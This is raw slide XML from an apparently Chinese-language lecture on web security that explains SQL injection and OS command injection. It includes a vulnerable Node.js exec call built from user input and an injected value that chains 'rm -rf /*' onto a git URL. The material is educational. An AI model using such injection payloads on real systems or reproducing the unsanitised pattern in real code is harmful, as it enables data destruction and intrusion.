            <a:ext cx="6372322" cy="2485205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAA3394E-5C50-4EB5-9BE5-3E9F8252F74B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6890973" y="2257970"/>
            <a:ext cx="4862973" cy="357402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000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>之前预想的SQL 语句是:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="20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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="ctr"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SELECT</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zh-CN" altLang="zh-CN" sz="16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FROM</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zh-CN" altLang="zh-CN" sz="16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user</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zh-CN" altLang="zh-CN" sz="16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WHERE</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username=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'admin'</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zh-CN" altLang="zh-CN" sz="16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AND</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psw=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'password</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’</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endParaRPr kumimoji="0" lang="en-US"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ctr" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN"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000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>但是恶意攻击者用奇怪用户名将你的 SQL 语句变成了如下形式：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="20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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="ctr"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SELECT</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zh-CN" altLang="zh-CN" sz="16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FROM</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zh-CN" altLang="zh-CN" sz="16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user</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zh-CN" altLang="zh-CN" sz="16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WHERE</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username=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'admin'</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zh-CN" altLang="zh-CN" sz="1600" b="0"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AND psw='xxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1600" b="0"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zh-CN"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endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN"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ctr" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="ctr"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000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>在 SQL 中,</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN"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zh-CN" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>是闭合和注释的意思，-- 是注释后面的内容的意思，所以查询语句就变成了：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="20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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="ctr" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="14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SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="1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zh-CN" altLang="zh-CN" sz="14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FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="1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zh-CN" altLang="zh-CN" sz="14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user</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="1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zh-CN" altLang="zh-CN" sz="14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WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="1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username=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'admin'</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="1050" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN"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3115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2.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令注入攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C362B605-5A22-4F10-9B67-01C17D60C363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584529" y="983142"/>
            <a:ext cx="10769271" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令注入和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入差不多，只不过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入是针对数据库的，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令注入是针对操作系统的。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令注入攻击指通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用，执行非法的操作系统命令达到攻击的目的。只要在能调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数的地方就有存在被攻击的风险。倘若调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>时存在疏漏，就可以执行插入的非法命令。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令注入攻击可以向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送命令，让</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>操作系统的命令行启动程序。也就是说，通过命令注入攻击可执行操作系统上安装着的各种程序。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E4F0421-5635-4F30-A114-B221C77C3944}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5132749" y="6567586"/>
            <a:ext cx="1621701" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>命令注入攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="AutoShape 4" descr="https://image.fundebug.com/2019-01-31-07.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95FB8662-4044-4DFC-9384-91815880210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矩形 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E73D58F-4527-4DFE-B6F5-E822342E6F73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1131376" y="2894869"/>
            <a:ext cx="10222424" cy="184665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zh-CN" dirty="0"/>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Node.js </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为例，假如在接口中需要从 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下载用户指定的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>repo </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>const exec = require('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>child_process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>').exec; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>let params = {/* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用户输入的参数 *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/}; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>exec(`git clone ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>params.repo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>} /some/path`);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>如果 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>params.repo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>传入的是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>https://github.com/admin/admin.github.io.git </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>确实能从指定的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>git repo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>上下载到想要的代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>但是如果 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>params.repo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>传入的是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>https://github.com/xx/xx.git &amp;&amp; rm -rf /* &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>恰好你的服务是用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>权限起的就糟糕了。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2D905CD-7D24-4BD5-94C9-25D0212BA443}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2814637" y="4952948"/>
            <a:ext cx="6257925" cy="1466850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9576933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2.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</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556409" y="1385634"/>
            <a:ext cx="4954929" cy="4801314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>应用程序是一种可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>访问的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="136EC2"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>应用程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>，程序的最大好处是用户很容易访问应用程序，用户只需要有浏览器即可，不需要再安装其他软件。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>应用程序是由完成特定任务的各种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>组件（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>web components)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>构成的并通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>将服务展示给外界。在实际应用中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>应用程序是由多个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
